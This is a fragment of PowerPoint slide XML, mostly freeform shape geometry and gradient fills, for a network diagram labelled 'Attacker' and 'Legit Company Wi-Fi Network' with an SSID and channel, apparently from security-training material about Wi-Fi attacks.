                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="774"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="4193CB">
                      <a:gamma/>
                      <a:tint val="50980"/>
                      <a:invGamma/>
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="4193CB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2" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00017264-28F5-46A1-A072-F05F29ABC5F9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm rot="3119117" flipH="1">
                <a:off x="6269155" y="1934981"/>
                <a:ext cx="929769" cy="520000"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 982"/>
                  <a:gd name="T1" fmla="*/ 774 h 774"/>
                  <a:gd name="T2" fmla="*/ 2 w 982"/>
                  <a:gd name="T3" fmla="*/ 770 h 774"/>
                  <a:gd name="T4" fmla="*/ 8 w 982"/>
                  <a:gd name="T5" fmla="*/ 754 h 774"/>
                  <a:gd name="T6" fmla="*/ 16 w 982"/>
                  <a:gd name="T7" fmla="*/ 730 h 774"/>
                  <a:gd name="T8" fmla="*/ 32 w 982"/>
                  <a:gd name="T9" fmla="*/ 698 h 774"/>
                  <a:gd name="T10" fmla="*/ 50 w 982"/>
                  <a:gd name="T11" fmla="*/ 660 h 774"/>
                  <a:gd name="T12" fmla="*/ 76 w 982"/>
                  <a:gd name="T13" fmla="*/ 618 h 774"/>
                  <a:gd name="T14" fmla="*/ 106 w 982"/>
                  <a:gd name="T15" fmla="*/ 574 h 774"/>
                  <a:gd name="T16" fmla="*/ 142 w 982"/>
                  <a:gd name="T17" fmla="*/ 528 h 774"/>
                  <a:gd name="T18" fmla="*/ 186 w 982"/>
                  <a:gd name="T19" fmla="*/ 482 h 774"/>
                  <a:gd name="T20" fmla="*/ 236 w 982"/>
                  <a:gd name="T21" fmla="*/ 438 h 774"/>
                  <a:gd name="T22" fmla="*/ 294 w 982"/>
                  <a:gd name="T23" fmla="*/ 398 h 774"/>
                  <a:gd name="T24" fmla="*/ 360 w 982"/>
                  <a:gd name="T25" fmla="*/ 360 h 774"/>
                  <a:gd name="T26" fmla="*/ 426 w 982"/>
                  <a:gd name="T27" fmla="*/ 332 h 774"/>
                  <a:gd name="T28" fmla="*/ 488 w 982"/>
                  <a:gd name="T29" fmla="*/ 314 h 774"/>
                  <a:gd name="T30" fmla="*/ 544 w 982"/>
                  <a:gd name="T31" fmla="*/ 304 h 774"/>
                  <a:gd name="T32" fmla="*/ 594 w 982"/>
                  <a:gd name="T33" fmla="*/ 300 h 774"/>
                  <a:gd name="T34" fmla="*/ 638 w 982"/>
                  <a:gd name="T35" fmla="*/ 300 h 774"/>
                  <a:gd name="T36" fmla="*/ 678 w 982"/>
                  <a:gd name="T37" fmla="*/ 304 h 774"/>
                  <a:gd name="T38" fmla="*/ 710 w 982"/>
                  <a:gd name="T39" fmla="*/ 312 h 774"/>
                  <a:gd name="T40" fmla="*/ 736 w 982"/>
                  <a:gd name="T41" fmla="*/ 320 h 774"/>
                  <a:gd name="T42" fmla="*/ 754 w 982"/>
                  <a:gd name="T43" fmla="*/ 326 h 774"/>
                  <a:gd name="T44" fmla="*/ 766 w 982"/>
                  <a:gd name="T45" fmla="*/ 332 h 774"/>
                  <a:gd name="T46" fmla="*/ 770 w 982"/>
                  <a:gd name="T47" fmla="*/ 334 h 774"/>
                  <a:gd name="T48" fmla="*/ 680 w 982"/>
                  <a:gd name="T49" fmla="*/ 476 h 774"/>
                  <a:gd name="T50" fmla="*/ 982 w 982"/>
                  <a:gd name="T51" fmla="*/ 370 h 774"/>
                  <a:gd name="T52" fmla="*/ 912 w 982"/>
                  <a:gd name="T53" fmla="*/ 0 h 774"/>
                  <a:gd name="T54" fmla="*/ 854 w 982"/>
                  <a:gd name="T55" fmla="*/ 150 h 774"/>
                  <a:gd name="T56" fmla="*/ 850 w 982"/>
                  <a:gd name="T57" fmla="*/ 148 h 774"/>
                  <a:gd name="T58" fmla="*/ 838 w 982"/>
                  <a:gd name="T59" fmla="*/ 142 h 774"/>
                  <a:gd name="T60" fmla="*/ 822 w 982"/>
                  <a:gd name="T61" fmla="*/ 134 h 774"/>
                  <a:gd name="T62" fmla="*/ 798 w 982"/>
                  <a:gd name="T63" fmla="*/ 126 h 774"/>
                  <a:gd name="T64" fmla="*/ 768 w 982"/>
                  <a:gd name="T65" fmla="*/ 120 h 774"/>
                  <a:gd name="T66" fmla="*/ 732 w 982"/>
                  <a:gd name="T67" fmla="*/ 114 h 774"/>
                  <a:gd name="T68" fmla="*/ 692 w 982"/>
                  <a:gd name="T69" fmla="*/ 110 h 774"/>
                  <a:gd name="T70" fmla="*/ 646 w 982"/>
                  <a:gd name="T71" fmla="*/ 110 h 774"/>
                  <a:gd name="T72" fmla="*/ 596 w 982"/>
                  <a:gd name="T73" fmla="*/ 116 h 774"/>
                  <a:gd name="T74" fmla="*/ 540 w 982"/>
                  <a:gd name="T75" fmla="*/ 126 h 774"/>
                  <a:gd name="T76" fmla="*/ 482 w 982"/>
                  <a:gd name="T77" fmla="*/ 146 h 774"/>
                  <a:gd name="T78" fmla="*/ 422 w 982"/>
                  <a:gd name="T79" fmla="*/ 172 h 774"/>
                  <a:gd name="T80" fmla="*/ 356 w 982"/>
                  <a:gd name="T81" fmla="*/ 210 h 774"/>
                  <a:gd name="T82" fmla="*/ 290 w 982"/>
                  <a:gd name="T83" fmla="*/ 258 h 774"/>
                  <a:gd name="T84" fmla="*/ 230 w 982"/>
                  <a:gd name="T85" fmla="*/ 310 h 774"/>
                  <a:gd name="T86" fmla="*/ 178 w 982"/>
                  <a:gd name="T87" fmla="*/ 364 h 774"/>
                  <a:gd name="T88" fmla="*/ 136 w 982"/>
                  <a:gd name="T89" fmla="*/ 422 h 774"/>
                  <a:gd name="T90" fmla="*/ 100 w 982"/>
                  <a:gd name="T91" fmla="*/ 480 h 774"/>
                  <a:gd name="T92" fmla="*/ 72 w 982"/>
                  <a:gd name="T93" fmla="*/ 536 h 774"/>
                  <a:gd name="T94" fmla="*/ 48 w 982"/>
                  <a:gd name="T95" fmla="*/ 590 h 774"/>
                  <a:gd name="T96" fmla="*/ 30 w 982"/>
                  <a:gd name="T97" fmla="*/ 640 h 774"/>
                  <a:gd name="T98" fmla="*/ 18 w 982"/>
                  <a:gd name="T99" fmla="*/ 684 h 774"/>
                  <a:gd name="T100" fmla="*/ 8 w 982"/>
                  <a:gd name="T101" fmla="*/ 722 h 774"/>
                  <a:gd name="T102" fmla="*/ 4 w 982"/>
                  <a:gd name="T103" fmla="*/ 750 h 774"/>
                  <a:gd name="T104" fmla="*/ 0 w 982"/>
                  <a:gd name="T105" fmla="*/ 768 h 774"/>
                  <a:gd name="T106" fmla="*/ 0 w 982"/>
                  <a:gd name="T107" fmla="*/ 774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82" h="774">
                    <a:moveTo>
                      <a:pt x="0" y="774"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="982" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="854" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="822" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="774"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="C7C037">
                      <a:gamma/>
                      <a:tint val="50980"/>
                      <a:invGamma/>
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="C7C037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583" name="Text Box 1432">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB4D929-BC9B-4907-A18E-47E633389D59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2156645" y="3890568"/>
              <a:ext cx="808363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Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1584" name="Rectangle 1583">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA1B8EC8-E7F8-4C83-967D-E7CF2DD79535}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9632208" y="3183655"/>
              <a:ext cx="2477588" cy="75405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Legit Company Wi-Fi Network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SSID: </a:t>
              </a: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certifiedhacker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Wi-Fi Channel: </a:t>
              </a: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6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1585" name="Picture 1584">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAB545F-C950-4629-8892-EA1856C4C97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65028" y="2588854"/>
              <a:ext cx="1391596" cy="1323343"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1586" name="Line 1724">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB971697-CA90-4836-B04C-B95397A4EC92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5497410" y="3148274"/>
              <a:ext cx="0" cy="1428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587" name="Group 484">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ED0B77D-C443-4A33-B659-360CDA44D0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55388" y="3092065"/>
              <a:ext cx="355600" cy="187325"/>
              <a:chOff x="5063" y="-2464"/>
              <a:chExt cx="1810" cy="954"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2073" name="Freeform 485">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03881217-F643-4861-A8D9-1F3B58063D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63" y="-2464"/>
                <a:ext cx="1810" cy="486"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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74" name="Freeform 486">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF64539-CD20-4079-B4D0-A3D30FA3514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63" y="-2344"/>
                <a:ext cx="1358" cy="834"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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75" name="Freeform 487">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CD1421-CB3B-44B4-B8FC-E7CEB1A3A80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421" y="-2101"/>
                <a:ext cx="452" cy="591"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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76" name="Freeform 488">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAD034B-144B-47B5-9783-A47887DD099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17" y="-2249"/>
                <a:ext cx="322" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 322"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 322"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 322 w 322"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 322 w 322"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 322"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="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77" name="Freeform 489">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899B5E44-F0E8-4C6A-8430-DDFFD7432E1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78" y="-2122"/>
                <a:ext cx="319" cy="416"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 416"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 331 h 416"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 416 h 416"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 416"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="416">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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78" name="Freeform 490">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD1D395-187D-4122-8C3F-A4B217F0517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036" y="-1994"/>
                <a:ext cx="319" cy="415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 319"/>
                  <a:gd name="T1" fmla="*/ 0 h 415"/>
                  <a:gd name="T2" fmla="*/ 0 w 319"/>
                  <a:gd name="T3" fmla="*/ 330 h 415"/>
                  <a:gd name="T4" fmla="*/ 319 w 319"/>
                  <a:gd name="T5" fmla="*/ 415 h 415"/>
                  <a:gd name="T6" fmla="*/ 319 w 319"/>
                  <a:gd name="T7" fmla="*/ 85 h 415"/>
                  <a:gd name="T8" fmla="*/ 0 w 319"/>
                  <a:gd name="T9" fmla="*/ 0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9" h="415">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="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588" name="Group 493">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F27D299-5189-4CDB-AAEF-2F377C30A2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88106" y="2847303"/>
              <a:ext cx="355600" cy="187325"/>
              <a:chOff x="2880" y="1638"/>
              <a:chExt cx="224" cy="118"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2070" name="Freeform 494">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8B0941-C0E6-4785-BC00-9D4F24B522A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80" y="1638"/>
                <a:ext cx="224" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1810"/>
                  <a:gd name="T1" fmla="*/ 120 h 486"/>
                  <a:gd name="T2" fmla="*/ 451 w 1810"/>
                  <a:gd name="T3" fmla="*/ 0 h 486"/>
                  <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                  <a:gd name="T5" fmla="*/ 363 h 486"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                  <a:gd name="T7" fmla="*/ 486 h 486"/>
                  <a:gd name="T8" fmla="*/ 0 w 1810"/>
                  <a:gd name="T9" fmla="*/ 120 h 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10" h="486">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1810" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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71" name="Freeform 495">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E256F3E5-F25A-45FD-8D7E-B93AE936DBB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80" y="1653"/>
                <a:ext cx="168" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 0 h 834"/>
                  <a:gd name="T2" fmla="*/ 0 w 1358"/>
                  <a:gd name="T3" fmla="*/ 470 h 834"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 834 h 834"/>
                  <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T7" fmla="*/ 366 h 834"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 0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8" h="834">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="36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72" name="Freeform 496">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D927B1-043B-40C9-8B3C-8207079B6FC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48" y="1683"/>
                <a:ext cx="56" cy="73"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 591 h 591"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 123 h 591"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 591"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 470 h 591"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                    <a:moveTo>
                      <a:pt x="0" y="591"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59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589" name="Line 1706">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998759ED-3A86-43FE-959B-34C8B41B6131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4801080" y="2777804"/>
              <a:ext cx="0" cy="2508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590" name="Group 1697">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D4FF84-E321-47C0-AF9B-86E1F761552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764568" y="2736529"/>
              <a:ext cx="236538" cy="201613"/>
              <a:chOff x="4876" y="-3681"/>
              <a:chExt cx="865" cy="735"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2062" name="Freeform 1698">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18DF534E-B65D-418C-8F08-B394D50C2BD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6" y="-3537"/>
                <a:ext cx="205" cy="506"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 87"/>
                  <a:gd name="T1" fmla="*/ 9 h 214"/>
                  <a:gd name="T2" fmla="*/ 14 w 87"/>
                  <a:gd name="T3" fmla="*/ 190 h 214"/>
                  <a:gd name="T4" fmla="*/ 69 w 87"/>
                  <a:gd name="T5" fmla="*/ 197 h 214"/>
                  <a:gd name="T6" fmla="*/ 75 w 87"/>
                  <a:gd name="T7" fmla="*/ 4 h 214"/>
                  <a:gd name="T8" fmla="*/ 43 w 87"/>
                  <a:gd name="T9" fmla="*/ 9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214">
                    <a:moveTo>
                      <a:pt x="43" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="17"/>
                      <a:pt x="0" y="171"/>
                      <a:pt x="14" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="209"/>
                      <a:pt x="49" y="214"/>
                      <a:pt x="69" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="182"/>
                      <a:pt x="87" y="16"/>
                      <a:pt x="75" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="4"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="43" y="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3" name="Freeform 1699">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
